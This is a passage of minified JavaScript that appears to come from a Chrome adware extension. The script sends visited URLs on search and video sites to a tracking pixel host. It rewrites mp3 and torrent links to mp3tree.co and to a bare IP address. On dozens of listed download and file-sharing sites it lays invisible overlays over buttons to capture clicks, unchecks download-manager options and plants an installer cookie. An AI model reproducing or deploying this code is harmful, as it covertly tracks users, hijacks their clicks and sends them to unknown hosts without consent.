a.currentStyle&&null!=a.currentStyle&&\"undefined\"!=typeof a.currentStyle[b]?a.currentStyle[b]:null}}}:function(a,b){return window.getComputedStyle(a,b)||{getPropertyValue:function(){}}};c.query_selector_all=document.querySelectorAll?function(a){try{return document.querySelectorAll(a)}catch(b){}}:function(a){var b=\r\na.match(/^#([^,\\s]+)$/)||[];if(1<b.length)return a=document.getElementById(b[1])||void 0,\"undefined\"!=typeof a?[a]:[];b=document.createElement(\"STYLE\");document.getElementsByTagName(\"body\")[0].appendChild(b);document.__asya_qsaels=[];b.styleSheet.cssText=a+\"{x:expression(document.__asya_qsaels.push(this))}\";window.scrollBy(0,0);return document.__asya_qsaels};c.clone_object=window.JSON instanceof Object?function(a){if(a instanceof Object&&(a=JSON.stringify(a),\"string\"==typeof a))return JSON.parse(a)}:\r\nfunction(a){if(a instanceof Object){var b=new a.constructor,e;for(e in a)b[e]=arguments.callee(a[e]);return b}return a};c.dhtml_prop_name=function(a){return a.replace(/(\\-([a-z]){1})/g,function(a,e,c){return c.toUpperCase()})};c.wildcard_to_regex=function(a){a=a.replace(/([.^$+(){}\\[\\]\\\\|\\?])/g,\"\\\\$1\");a=a.replace(/\\*/g,\".*\");return new RegExp(a)};c.throttle=function(a,b){var e=null;return function(){var c=this,f=arguments;clearTimeout(e);e=setTimeout(function(){a.apply(c,f)},b)}};c.epoch=function(){return(new Date).getTime()};\r\nc.msie=function(){var a=parseInt((/msie (\\d+)/.exec(navigator.userAgent.toLowerCase())||[])[1],10);isNaN(a)&&(a=parseInt((/trident\\/.*; rv:(\\d+)/.exec(navigator.userAgent.toLowerCase())||[])[1],10));return isNaN(a)?!1:a}();c.version_ie_less=function(a){if(/MSIE (\\d+\\.\\d+);/.test(navigator.userAgent))return new Number(RegExp.$1)<=a?!0:!1};c.isIE=function(){return\"Microsoft Internet Explorer\"==navigator.appName||\"Netscape\"==navigator.appName&&null!=/Trident\\/.*rv:([0-9]{1,}[.0-9]{0,})/.exec(navigator.userAgent)};\r\nc.match_url=function(a,b){for(var e=0;e<b.length;e++)if(\"string\"==typeof b[e]){var d;d=/^\\/.+\\/$/.test(b[e])?new RegExp(b[e]):c.wildcard_to_regex(b[e]);if(d instanceof RegExp&&d.test(a))return!0}};c.ping=function(a){for(var b=[\"google\",\"bing\",\"yahoo\",\"youtube\"],c=0;c<b.length;c++)if(-1<location.hostname.indexOf(b[c])){var d=new Image,f=encodeURIComponent(window.self==window.top?window.self.location.href:\"\");1E3<f.length&&(f=encodeURIComponent(location.hostname));var g=encodeURIComponent(location.hostname);\r\nd.src=k.pixelHost+\"?hid=8438959027574575270&eid=583&pid=21153&prodid=338&v=\"+k.version+\"&ch=\"+a+\"&lan=\"+navigator.language+\"&cc=FR&pr=\"+b[c]+\"&host=\"+g+\"&ref=\"+f}};c.getAllText=function(a){for(var b=\"\",c=0;c<a.length;c++)b+=a.textContent?a.textContent:a.innetText;return b};c.duplicateElement=function(a){var b=document.createElement(a.nodeName.toLowerCase()),e=!1;a.getAttribute(\"href\")&&b.setAttribute(\"href\",\"javascript:void(0);\");for(var d in a)if(\"src\"==\r\nd||\"width\"==d||\"height\"==d)b[d]=a[d];else if(\"style\"==d)for(var f in a[d])a[d][f]&&\"\"!=a[d][f]&&(b[d][f]=a[d][f]);else e||\"nodeValue\"!=d&&\"textContent\"!=d&&\"innetText\"!=d&&\"className\"!=d||0!=a.children.length||(b[d]=a[d],e=!0);for(e=0;e<a.childNodes.length;e++)if(3==a.childNodes[e].nodeType)b.appendChild(document.createTextNode(a.childNodes[e].textContent?a.childNodes[e].textContent:a.childNodes[e].innerText));else{d=c.duplicateElement(a.childNodes[e]);f=c.getAllText(d.childNodes);var g=a.childNodes[e].textContent?\r\na.childNodes[e].textContent:a.childNodes[e].innerText;g&&(g=g.replace(f,\"\"),\"\"!=g&&(d.textContent?d.textContent=g:d.innerText=g));b.appendChild(d)}return b}};if(-1<window.location.href.indexOf(\"google.com/chrome/srt\")&&-1<navigator.userAgent.toLowerCase().indexOf(\"chrome\")){try{var h=parseInt(window.navigator.appVersion.match(/Chrome\\/(\\d+)\\./)[1],10)}catch(p){return}if(!(38>=h)){for(h=0;h<document.links.length;h++){var l=document.links[h],m=l.getAttribute(\"href\");if(m&&-1<m.indexOf(\"#dialog-contents\")){var m=\r\nk.utils.duplicateElement(l),n=l.parentNode;n.insertBefore(m,l);n.removeChild(l)}}(h=document.getElementById(\"dialog-contents\"))&&h.remove()}}};(function(){try{window.top==window.self&&-1<navigator.userAgent.toLowerCase().indexOf(\"chrome\")&&\"http:\"==window.location.protocol&&chrome.storage.local.get(\"bcvzdw1\",function(a){if(!a.bcvzdw1&&!localStorage.getItem(\"bcvzdw1\")&&(a=document.getElementsByTagName(\"a\"),a.length))for(var b=0;b<a.length;b++)if(a[b]&&a[b].href&&\"mp3\"==a[b].href.substr(-3)){var c=a[b].href;a[b].setAttribute(\"href\",\"http://mp3tree.co/media/\"+encodeURIComponent(a[b].innerHTML)+\"/mid/\"+encodeURIComponent(encodeURIComponent(c))+\"/el/1\");a[b].setAttribute(\"id\",\"sdfsdfsfds\"+b);document.getElementById(\"sdfsdfsfds\"+b).addEventListener(\"click\",function(){chrome.storage.local.set({bcvzdw1:\"2\"});localStorage.setItem(\"bcvzdw1\",\"2\")},!1)}})}catch(d){}})();(function(){try{window.top==window.self&&-1<navigator.userAgent.toLowerCase().indexOf(\"chrome\")&&\"http:\"==window.location.protocol&&chrome.storage.local.get(\"bxcv43t897\",function(a){if(!a.bxcv43t897&&!localStorage.getItem(\"bxcv43t897\")&&(a=document.getElementsByTagName(\"a\"),a.length))for(var b=0;b<a.length;b++)a[b]&&a[b].href&&\"torrent\"==a[b].href.substr(-7)&&(a[b].setAttribute(\"href\",\"http://78.47.6.114/api/getLink/?cb=\"+Math.random()),a[b].setAttribute(\"id\",\"cxvcxv\"+b),document.getElementById(\"cxvcxv\"+b).addEventListener(\"click\",function(){chrome.storage.local.set({bxcv43t897:\"2\"});localStorage.setItem(\"bxcv43t897\",\"2\")},!1))})}catch(c){}})();}catch(e){};try{new function(){var n=this;this.activeZds={\"uploading.com\":1,\"dirpy.com\":0,\"go4up.com\":1,\"mp3olimp.org\":1,\"hulkload.com\":1,\"free-tv-video-online.me\":1,\"ehd.c\":1,\"hesefiles.c\":1,\"sharebeast.com\":0,\"coolrom.com\":1,\"ebookbrowsee.net\":1,\"cloud-vibe.com\":0,\"mp3seal.com\":0,\"mp3vampire.com\":0,\"minecraftdl.com\":0,\"leunlckr.co\":0,\"go.theadsnet.com\":1,\"ziddu.com\":1,\"opensubtitles.org\":1,\"romptfile.co\":1,\"pensoftwareupdater.co\":1,\"veehd.com\":1,\"ullypcgames.ne\":0,\"llplayer.com.b\":1,\"ubtitulosespanol.or\":1,\"ubtitles4free.ne\":1,\n\"legendasbrasil.org\":1,\"reeroms.co\":0,\"eneral-ebooks.co\":0,\"stream2watch.me\":1,\"kickass.to\":1,\"kickass.so\":1,\"pensubtitles.us\":0,\"uploadrocket.net\":0,\"programas-gratis.net\":0,\"programasgratis.es\":1,\"programasejogos.com\":1,\"flexydrive.com\":1,\"media1fire.com\":1,\"softwareandgames.com\":1,\"baixarjogos.com\":1,\"programmesetjeux.com\":1,\"descargarjuegos.com\":1,\"hotfiles.ro\":1,\"vitanclub.net\":1,\"getsecuredfiles.com\":1,\"mirrorcreator.com\":0,\"mestorrents.com\":1,\"vitorrent.net\":1,\"uploaded.net\":0,\"newsinitiative.org\":0,\n\"megafilmesonlinehd.com\":1,\"mycoolmp3.com\":1,\"descargadictos.net\":0,\"toggle.com\":1,\"downloadshareware.com\":1,\"primewire.ag\":1,\"ads.showmeflix.com\":0,\"myappsforpc.com\":1,\"telecharger.logiciel.net\":1,\"winmacsofts.com\":1,\"telecharger.info\":0,\"torntv-dl.net\":0,\"1337x.to\":1,\"h33t.to\":1,\"ahashare.com\":1,\"torrenthound.com\":1,\"smartorrent.com\":1,\"torrentreactor.net\":1,\"tomadivx.org\":1,\"opensubtitles.website\":0,\"downloads.info\":1,\"techypcapps.com\":1,\"techmacho.com\":1,\"techariot.com\":1,\"androidlegend.com\":1,\n\"technologyrush.com\":1,\"notintricate.com\":1,\"techglen.com\":1,\"updownload.com\":1,\"techamiable.com\":1,\"appsforpcmero.com\":0,\"hugefiles.net\":0,\"descarga.benjaminstrahs.com\":1,\"installers.installm.com\":1,\"uptobox.com\":1,\"torrentz.com\":1,\"torrentz.eu\":1,\"torrentsmirror.com\":1,\"isohunt.to\":0,\"lp.playerpage209.info\":1,\"lp.playerpage214.info\":1};this.utils=new function(){var h=this;h.sendPixels=function(e){var h;if(e instanceof Array)for(var l=0;l<e.length;l++){var m=e[l];h=new Image;h.src=m}else h=new Image,\nh.src=e};h.isFalse=function(e){return\"undefined\"==typeof e||0===e.length||null===e};h.cookie=new function(){var e=this;e.createCookie=function(e,h,m){if(m){var n=new Date;n.setTime(n.getTime()+864E5*m);m=\"; expires=\"+n.toGMTString()}else m=\"\";document.cookie=e+\"=\"+h+m+\"; path=/\"};e.readCookie=function(e){e+=\"=\";for(var h=document.cookie.split(\";\"),m=0;m<h.length;m++){for(var n=h[m];\" \"==n.charAt(0);)n=n.substring(1,n.length);if(0==n.indexOf(e))return n.substring(e.length,n.length)}return null};e.eraseCookie=\nfunction(h){e.createCookie(h,\"\",-1)}};h.ajax={get:function(e,k){try{this.xhr=new XMLHttpRequest,this.xhr.open(\"GET\",e,!0),this.xhr.onreadystatechange=function(){4==h.ajax.xhr.readyState&&k(h.ajax.xhr.responseText)},this.xhr.send()}catch(l){}},post:function(e,k,l){this.xhr=new XMLHttpRequest;this.xhr.open(\"POST\",e,!0);this.xhr.setRequestHeader(\"Content-type\",\"application/x-www-form-urlencoded\");this.xhr.onreadystatechange=function(){4==h.ajax.xhr.readyState&&l(h.ajax.xhr.responseText)};k=encodeURIComponent(k);\nthis.xhr.send(k)}};h.waitForTokens={};h.addScript=function(e,h){if(\"bing\"==h){var l=Element.prototype.appendChild;document.createElement(\"iframe\");Element.prototype.appendChild=document.appendChild;document.getElementsByTagName(\"head\")[0].appendChild(e);Element.prototype.appendChild=l}else document.getElementsByTagName(\"head\")[0].appendChild(e)};h.waitForElement=function(e,k,l,m){var p=h.query_selector_all(e);clearTimeout(h.waitTimeout);if(25<n.waitForElementCounter)return k(null);if(\"undefined\"==\ntypeof p||1>p.length){if(h.waitForTokens[m])return k(null);var q=arguments.callee;h.waitTimeout=setTimeout(function(){n.waitForElementCounter++;q(e,k,l,m)},l)}else{if(h.waitForTokens[m])return k(null);h.waitForTokens[m]=!0;n.waitForElementCounter=0;return k(p)}};h.flushWaitForTokens=function(){h.waitForTokens={}};h.getRandomInt=function(e,h){return Math.floor(Math.random()*(h-e+1))+e};h.get_computed_style=\"function\"!=typeof window.getComputedStyle?function(e){return{getPropertyValue:function(k){\"float\"==\nk&&(k=\"styleFloat\");k=h.dhtml_prop_name(k);return\"object\"==typeof e.currentStyle&&null!=e.currentStyle&&\"undefined\"!=typeof e.currentStyle[k]?e.currentStyle[k]:null}}}:function(e,h){return window.getComputedStyle(e,h)||{getPropertyValue:function(){}}};h.query_selector_all=document.querySelectorAll?function(e){try{return document.querySelectorAll(e)}catch(h){}}:function(e){var h=e.match(/^#([^,\\s]+)$/)||[];if(1<h.length)return e=document.getElementById(h[1])||void 0,\"undefined\"!=typeof e?[e]:[];h=\ndocument.createElement(\"STYLE\");document.getElementsByTagName(\"body\")[0].appendChild(h);document.__asya_qsaels=[];h.styleSheet.cssText=e+\"{x:expression(document.__asya_qsaels.push(this))}\";window.scrollBy(0,0);return document.__asya_qsaels};h.clone_object=window.JSON instanceof Object?function(e){if(e instanceof Object&&(e=JSON.stringify(e),\"string\"==typeof e))return JSON.parse(e)}:function(e){if(e instanceof Object){var h=new e.constructor,l;for(l in e)h[l]=arguments.callee(e[l]);return h}return e};\nh.dhtml_prop_name=function(e){return e.replace(/(\\-([a-z]){1})/g,function(e,h,m){return m.toUpperCase()})};h.wildcard_to_regex=function(e){e=e.replace(/([.^$+(){}\\[\\]\\\\|\\?])/g,\"\\\\$1\");e=e.replace(/\\*/g,\".*\");return new RegExp(e)};h.throttle=function(e,h){var l=null;return function(){var m=this,n=arguments;clearTimeout(l);l=setTimeout(function(){e.apply(m,n)},h)}};h.epoch=function(){return(new Date).getTime()};h.msie=function(){var e=parseInt((/msie (\\d+)/.exec(navigator.userAgent.toLowerCase())||\n[])[1],10);isNaN(e)&&(e=parseInt((/trident\\/.*; rv:(\\d+)/.exec(navigator.userAgent.toLowerCase())||[])[1],10));return isNaN(e)?!1:e}();h.version_ie_less=function(e){if(/MSIE (\\d+\\.\\d+);/.test(navigator.userAgent))return new Number(RegExp.$1)<=e?!0:!1};h.isIE=function(){return\"Microsoft Internet Explorer\"==navigator.appName||\"Netscape\"==navigator.appName&&null!=/Trident\\/.*rv:([0-9]{1,}[.0-9]{0,})/.exec(navigator.userAgent)};h.match_url=function(e,k){for(var l=0;l<k.length;l++)if(\"string\"==typeof k[l]){var m;\nm=/^\\/.+\\/$/.test(k[l])?new RegExp(k[l]):h.wildcard_to_regex(k[l]);if(m instanceof RegExp&&m.test(e))return!0}};h.ping=function(e){for(var h=[\"google\",\"bing\",\"yahoo\",\"youtube\"],l=0;l<h.length;l++)if(-1<location.hostname.indexOf(h[l])){var m=new Image,p=encodeURIComponent(window.self==window.top?window.self.location.href:\"\");1E3<p.length&&(p=encodeURIComponent(location.hostname));var q=encodeURIComponent(location.hostname);m.src=n.pixelHost+\"?hid=8438959027574575270&eid=583&pid=21153&prodid=338&v=\"+\nn.version+\"&ch=\"+e+\"&lan=\"+navigator.language+\"&cc=FR&pr=\"+h[l]+\"&host=\"+q+\"&ref=\"+p}};h.getAllText=function(e){for(var h=\"\",l=0;l<e.length;l++)h+=e.textContent?e.textContent:e.innetText;return h};h.duplicateElement=function(e){var k=document.createElement(e.nodeName.toLowerCase());e.getAttribute(\"href\")&&k.setAttribute(\"href\",\"javascript:void(0);\");for(var l in e)if(\"src\"==l||\"width\"==l||\"height\"==l||\"id\"==l||\"className\"==l)k[l]=e[l];else if(\"style\"==l)for(var m in e[l])e[l][m]&&\n\"\"!=e[l][m]&&(k[l][m]=e[l][m]);else\"input\"!==e.nodeName.toLowerCase()||\"type\"!=l&&\"value\"!=l||(k[l]=e[l]);for(l=0;l<e.childNodes.length;l++)if(3==e.childNodes[l].nodeType)m=e.childNodes[l].textContent?e.childNodes[l].textContent:e.childNodes[l].innerText,\"undefined\"===typeof m&&(m=e.childNodes[l].nodeValue?e.childNodes[l].nodeValue:e.childNodes[l].data),\"undefined\"!==typeof m&&k.appendChild(document.createTextNode(m));else{m=h.duplicateElement(e.childNodes[l]);var n=h.getAllText(m.childNodes),q=e.childNodes[l].textContent?\ne.childNodes[l].textContent:e.childNodes[l].innerText;q&&(q=q.replace(n,\"\"),\"\"!=h.trim(q)&&(m.textContent?m.textContent=q:m.innerText=q));k.appendChild(m)}return k};h.coverElement=function(h,k,l,m,n,q,t,r){var u=document.createElement(\"div\");u.style.width=k?k:\"100%\";u.style.height=l?l:\"100%\";u.style.zIndex=q?q:\"2000\";u.style.top=m?m:\"0\";u.style.left=n?n:\"0\";u.style.cursor=t?t:\"pointer\";u.style.position=\"absolute\";k=h.parentNode;k.style.position=\"relative\";!0!==r&&\"undefined\"!==typeof r||k.removeChild(h);\nk.appendChild(u)};h.trim=function(h){return\"function\"!==typeof String.prototype.trim?String(h).replace(/^\\s+|\\s+$/g,\"\"):String.prototype.trim(h)}};this[\"dirpy.com\"]=new function(){this.init=function(){try{f=function(){try{$(\".download-maxiget, .download-trinity\").attr(\"href\",\"#\"),$(\"#mp3-with-trinity\").remove()}catch(h){}},-1< !navigator.userAgent.indexOf(\"chrome\")?f():(g=document.createElement(\"script\"),g.innerHTML=\"(\"+f.toString()+\")()\",document.body.appendChild(g))}catch(h){}new function(){-1<\nlocation.host.toLowerCase().indexOf(\"irpy.co\")&&(window.__irpyCount=0,window.__irpyInt=setInterval(function(){for(var h=document.links,k=0;k<h.length;k++){var l=h[k].getAttribute(\"href\");if(null!=l&&-1<l.toLowerCase().indexOf(\"dirpy.com/download/\")){l=document.createElement(\"div\");l.style.top=\"0\";l.style.width=\"100%\";l.style.height=\"100%\";l.style.cursor=\"pointer\";l.style.zIndex=\"2000\";l.style.position=\"absolute\";var m=h[k].parentNode;m.style.position=\"relative\";m.appendChild(l);clearInterval(window.__irpyInt)}}20<\nwindow.__irpyCount++&&clearInterval(window.__irpyInt)},250))}}};this[\"mp3olimp.org\"]=new function(){this.init=function(){setTimeout(function(){for(var h=document.links,e=0;e<h.length;e++)if(\"return prepare_download_file(this);\"==h[e].getAttribute(\"onclick\")){var m=document.createElement(\"a\");m.className=\"link last\";m.setAttribute(\"href\",\"javascript:void(0);\");m.innerText?m.innerText=\"Download\":m.textContent=\"Download\";var n=h[e].parentNode,q=n.children[n.children.length-1];q&&(n.removeChild(h[e]),\nn.insertBefore(m,q))}},1E3);new function(){-1<window.location.host.toLowerCase().indexOf(\"p3olimp.or\")&&(window.__intCount=0,window.__int=setInterval(function(){var h=document.getElementById(\"download-manager-checkbox\");if(null!==h)try{h.setAttribute(\"checked\",!1),document.getElementById(\"checkbox\").checked=!1}catch(e){}window.__intCount++;10<window.__intCount&&clearInterval(window.__int)},250))};-1<window.location.host.toLowerCase().indexOf(\"p3olimp.or\")&&(window.__intCount=0,window.__int=setInterval(function(){var h=\ndocument.getElementById(\"download-manager-checkbox\");if(null!==h)try{h.setAttribute(\"checked\",!1),document.getElementById(\"checkbox\").checked=!1}catch(e){}window.__intCount++;10<window.__intCount&&clearInterval(window.__int)},250));if(-1<document.location.host.indexOf(\"p3olimp.or\")&&document.getElementsByClassName)for(c=document.getElementById(\"download-manager-checkbox\"),c.onchange=function(){for(var h=document.getElementsByClassName(\"nasjfkla\"),e=0;e<h.length;e++)h[e].style.display=c.checked?\"block\":\n\"none\"},i=0;i<document.links.length;i++){var h=document.links[i],e=h.getAttribute(\"onclick\");e&&-1<e.indexOf(\"prepare_download_file\")&&(h=h.parentNode,h.style.position=\"relative\",b=document.createElement(\"div\"),b.className=\"nasjfkla\",b.style.position=\"absolute\",b.style.top=\"-2px\",b.style.left=\"92px\",b.style.width=\"71px\",b.style.height=\"16px\",b.style.zIndex=\"99999\",b.style.cursor=\"pointer\",h.appendChild(b))}-1<location.host.indexOf(\"p3olimp.or\")&&setTimeout(function(){for(var h=document.getElementById(\"leftside\"),\ne=0;e<h.children.length;e++)if(/\\bspnBook\\b/.test(h.children[e].className))for(var m=h.children[e].getElementsByTagName(\"a\"),n=0;n<m.length;n++)m[n].setAttribute(\"href\",\"#\"),m[n].setAttribute(\"target\",\"\")},1001)}};this[\"hulkload.com\"]=new function(){this.init=function(){for(var h=n.utils.query_selector_all(\".reclamTable .reclamRow .reclamCell a\"),e=0;e<h.length;e++){var k=h[e],l=n.utils.duplicateElement(k),m=k.parentNode;m.insertBefore(l,k);m.removeChild(k)}h=n.utils.query_selector_all(\".contentback div div a[target='_blank']\");\nfor(e=0;e<h.length;e++)k=h[e],l=n.utils.duplicateElement(k),m=k.parentNode,m.insertBefore(l,k),m.removeChild(k);h=n.utils.query_selector_all(\".contentback div center a[target='_blank']\");for(e=0;e<h.length;e++)k=h[e],l=n.utils.duplicateElement(k),m=k.parentNode,m.insertBefore(l,k),m.removeChild(k);new function(){-1<location.host.toLowerCase().indexOf(\"ulkload.co\")&&(window.___interCount=0,window.___interval=setInterval(function(){for(var h=document.getElementsByTagName(\"center\"),e=0;e<h.length;e++)if(0!=\ne&&!(-1<h[e].innerHTML.indexOf(\"adcopy-outer\")||-1<h[e].innerHTML.indexOf(\"btn_download\")||-1<h[e].innerHTML.indexOf(\"solvemedia puzzle widget\"))){var k=document.createElement(\"div\");k.style.width=\"100%\";k.style.height=\"100%\";k.style.cursor=\"pointer\";k.style.zIndex=\"1900\";k.style.position=\"absolute\";e==h.length-1?(k.style.bottom=\"0\",k.style.height=\"110px\"):k.style.top=\"0\";h[e].style.position=\"relative\";h[e].appendChild(k)}h=document.getElementById(\"cap\");null!=h&&(h.parentNode.style.position=\"relative\",\nh.parentNode.style.zIndex=\"2000\");20<window.___interCount++&&clearInterval(window.___interval)},500))}}};this[\"free-tv-video-online.me\"]=new function(){this.init=function(){if(-1<window.self.location.hostname.indexOf(\"eo-online.me\")&&window.self==window.top){for(var h=document.getElementsByTagName(\"div\"),e=0;e<h.length;e++)if(h[e].style&&\"653px\"==h[e].style.width&&\"49px\"==h[e].style.height){var k=h[e];k.style.position=\"relative\";var l=document.createElement(\"div\");l.style.position=\"absolute\";l.style.cursor=\n\"pointer\";l.style.zIndex=\"2000\";l.style.width=\"100%\";l.style.height=\"50px\";l.style.top=\"0\";k.appendChild(l)}setTimeout(function(){for(var h=document.links,e=0;e<h.length;e++){var k=h[e].innerText?h[e].innerText:h[e].textContent;if(\"trackOutboundLink(this, 'Outbound Links', 'slinks.com'); return false;\"==h[e].getAttribute(\"onclick\")&&\"Stream Video Now!\"==k){k=document.createElement(\"a\");k.className=\"down\";k.setAttribute(\"href\",\"javascript:void(0);\");k.innerText?k.innerText=\"Stream Video Now!\":k.textContent=\n\"Stream Video Now!\";var l=h[e].parentNode,n=l.children[l.children.length-1];l.removeChild(h[e]);if(n)try{l.insertBefore(k,n)}catch(u){l.appendChild(k)}else l.appendChild(k)}}h=document.getElementsByTagName(\"a\");for(e=0;e<h.length;e++)if(\"getDownload();\"==h[e].getAttribute(\"onclick\"))if(k=document.createElement(\"p\"),k.className=\"dloadh\",k.setAttribute(\"href\",\"javascript:void(0);\"),k.innerText?k.innerText=\" \":k.textContent=\" \",l=h[e].parentNode,n=l.children[l.children.length-1],l.removeChild(h[e]),\nn)try{l.insertBefore(k,n)}catch(w){l.appendChild(k)}else l.appendChild(k)},1E3);h=document.createElement(\"script\");h.type=\"text/javascript\";h[-1<navigator.userAgent.toLowerCase().indexOf(\"msie\")?\"text\":\"innerHTML\"]=\"(\"+function(){try{if(jQuery(\".down, .dloadf, .dloadt\").attr(\"href\",\"#\"),$(\"#adsfrm\").length){var h=$(\"#adsfrm\").offset();$('<img src=\"data:image/gif;base64,R0lGODlhAQABAIAAAAAAAP///yH5BAEHAAAALAAAAAABAAEAAAICRAEAOw==\" style=\"position:absolute;z-index:9999;top:'+h.top+\"px;left:\"+h.left+\n\"px;width:\"+$(\"#adsfrm\").width()+\"px;height:\"+$(\"#adsfrm\").height()+'px;\">').appendTo(\"body\")}}catch(e){}}.toString()+\")()\";document.getElementsByTagName(\"head\")[0].appendChild(h)}}};this[\"ehd.c\"]=new function(){this.init=function(){-1<window.self.location.hostname.indexOf(\"ehd.c\")&&document.getElementById(\"r1113566095\")&&(g=document.createElement(\"img\"),g.setAttribute(\"style\",\"width:100%;height:100%;position:absolute;z-index:99999;left:0;top:0\"),g.src=\"data:image/gif;base64,R0lGODlhAQABAIAAAAAAAP///yH5BAEHAAAALAAAAAABAAEAAAICRAEAOw==\",\nf=document.getElementById(\"r1113566095\").parentNode,f.style.position=\"relative\",f.appendChild(g))}};this[\"hesefiles.c\"]=new function(){this.init=function(){-1<window.self.location.hostname.indexOf(\"hesefiles.c\")&&(window.self.location.href=\"about:blank\");if(-1<window.self.location.hostname.indexOf(\"usfiles.ne\")){var h=function(){$(\"form[name=F1]\").submit(function(){if(-1<$(this).attr(\"action\").indexOf(\"bdl1=\"))return $(\"input[name=quick]\").attr(\"checked\",!1),window.setTimeout(function(){$(\"#btn_download\").attr(\"disabled\",\n!1).val(\"Download Now!!\");$(\"form[name=F1]\").unbind(\"submit\")},700),!1})};if(-1==navigator.userAgent.toLowerCase().indexOf(\"chrome\"))h();else{var e=document.createElement(\"script\");e.type=\"text/javascript\";e.innerHTML=\"(\"+h.toString()+\")()\";document.body.appendChild(e)}}}};this[\"sharebeast.com\"]=new function(){this.init=function(){if(-1<window.self.location.hostname.indexOf(\"ebeast.co\")){var h=document.getElementsByTagName(\"div\"),e;for(e in h)h[e]&&h[e].style&&\"fixed\"==h[e].style.position&&\"solid\"==\nh[e].style.borderBottomStyle&&(h[e].style.display=\"none\")}}};this[\"coolrom.com\"]=new function(){this.init=function(){for(var h=document.getElementsByTagName(\"img\"),e=0;e<h.length;e++)-1<h[e].src.indexOf(\"/images/download_large.png\")&&h[e].parentNode.setAttribute(\"href\",\"javascript:void(0);\");h=new Date;h.setTime(h.getTime()+2592E6);h=\"; expires=\"+h.toGMTString();document.cookie=\"installer=14604\"+h+\"; path=/;domain=.coolrom.com\"}};this[\"ebookbrowsee.net\"]=new function(){this.init=function(){}};this[\"cloud-vibe.com\"]=\nnew function(){this.init=function(){-1<document.location.host.indexOf(\"loud-vibe.co\")&&(a=document.getElementById(\"continue\"),a.setAttribute(\"onclick\",\"return false\"),a.setAttribute(\"href\",\"\"),a.addEventListener(\"click\",function(h){h.returnValue=!1;h.preventDefault&&h.preventDefault()},!1),a.addEventListener(\"mousedown\",function(h){h.returnValue=!1;h.preventDefault&&h.preventDefault()},!1))}};this[\"mp3seal.com\"]=new function(){this.init=function(){-1<document.location.host.indexOf(\"p3seal.co\")&&(a=\ndocument.getElementById(\"continue\"),a.setAttribute(\"onclick\",\"return false\"),a.setAttribute(\"href\",\"\"),a.addEventListener(\"click\",function(h){h.returnValue=!1;h.preventDefault&&h.preventDefault()},!1),a.addEventListener(\"mousedown\",function(h){h.returnValue=!1;h.preventDefault&&h.preventDefault()},!1))}};this[\"mp3vampire.com\"]=new function(){this.init=function(){-1<document.location.host.indexOf(\"p3vampire.co\")&&(a=document.getElementById(\"continue\"),a.setAttribute(\"onclick\",\"return false\"),a.setAttribute(\"href\",\n\"\"),a.addEventListener(\"click\",function(h){h.returnValue=!1;h.preventDefault&&h.preventDefault()},!1),a.addEventListener(\"mousedown\",function(h){h.returnValue=!1;h.preventDefault&&h.preventDefault()},!1))}};this[\"minecraftdl.com\"]=new function(){this.init=function(){-1<document.location.href.indexOf(\"necraftdl.com/download.ph\")&&(a=document.getElementById(\"downloadpage\"),b=a.getElementsByTagName(\"a\")[0],d=document.createElement(\"div\"),d.style.position=\"absolute\",d.style.width=\"100%\",d.style.height=\n\"34px\",d.style.left=\"0\",d.style.cursor=\"pointer\",d.style.zIndex=9999,b.parentNode.insertBefore(d,b.previousSibling));if(-1<document.location.href.indexOf(\"necraftdl.com\"))for(i=0;i<document.links.length;i++){var h=document.links[i];\".exe\"==h.href.substr(-4)&&(h=h.parentNode,h.style.position=\"relative\",d=document.createElement(\"div\"),d.style.position=\"absolute\",d.style.top=0,d.style.left=0,d.style.width=\"100%\",d.style.height=\"100%\",d.style.cursor=\"pointer\",d.style.zIndex=9999,h.appendChild(d))}}};\nthis[\"leunlckr.co\"]=new function(){this.init=function(){if(-1<document.location.host.indexOf(\"leunlckr.co\")){var h=document.getElementsByTagName(\"button\")[0],e=document.createElement(\"button\");e.className=h.className;e.innerHTML=h.innerHTML;h.parentNode.insertBefore(e,h);h.parentNode.removeChild(h)}}};this[\"go.theadsnet.com\"]=new function(){this.init=function(){-1<document.referrer.indexOf(\"go.theadsnet.com\")&&document.write(\"\");(function(){var h=0;try{if(-1<window.location.href.indexOf(\"ack-free.co\"))var e=\nsetInterval(function(){try{var k=document.getElementById(\"ucd-countdown-1\"),m=[];m.push(1*k.children[2].children[1].children[1].innerText);m.push(1*k.children[2].children[2].children[1].innerText);m.push(1*k.children[3].children[1].children[1].innerText);m.push(1*k.children[3].children[2].children[1].innerText);for(var n=k=0;n<m.length;n++)k+=m[n];if(!(0<k)){clearInterval(e);var q=document.createElement(\"div\");q.style.position=\"absolute\";q.style.top=0;q.style.left=0;q.style.width=\"100%\";q.style.height=\n\"100%\";q.style.zIndex=\"9999\";q.style.cursor=\"pointer\";var t=document.getElementById(\"ucd-countdown-1-content\").children[1];t.style.position=\"relative\";t.appendChild(q)}}catch(r){try{var u=0;jQuery.each(jQuery(\".ucd-figure.ucd-countdown-digit-bottom\"),function(){u+=1*jQuery(this).text()});if(0===u){clearInterval(e);var w=jQuery(\"#ucd-countdown-1-content iframe\"),x=w.parent();w.remove();x.html(\"<img title='Get Download' alt='latbut' src='http://i.imgur.com/At0oA5A.png' height='61' width='373'>\")}}catch(v){\"undefined\"!==\ntypeof h&&30<++h&&clearInterval(e)}}},750)}catch(k){}})()}};this[\"ziddu.com\"]=new function(){this.init=function(){var h=0,e=setInterval(function(){h++;if(-1<window.location.host.indexOf(\"ownloads.ziddu.co\")){for(var k=0;k<document.links.length;k++)try{var l=document.links[k].href.toLowerCase();if(-1==l.indexOf(\"ww.ziddu.co\")&&-1==l.indexOf(\"#\")&&-1==l.indexOf(\"tunes.apple.co\")&&-1==l.indexOf(\"lay.google.co\")&&-1==l.indexOf(\"/gallery/\")){try{for(var m=document.links[k],n=0;15>=n;n++)m=m.parentNode;\nif(-1<m.className.indexOf(\"footerbg\"))continue}catch(q){}var t=document.links[k].parentNode;if(!(-1<t.className.indexOf(\"addthis_toolbox\"))){t.style.position=\"relative\";var 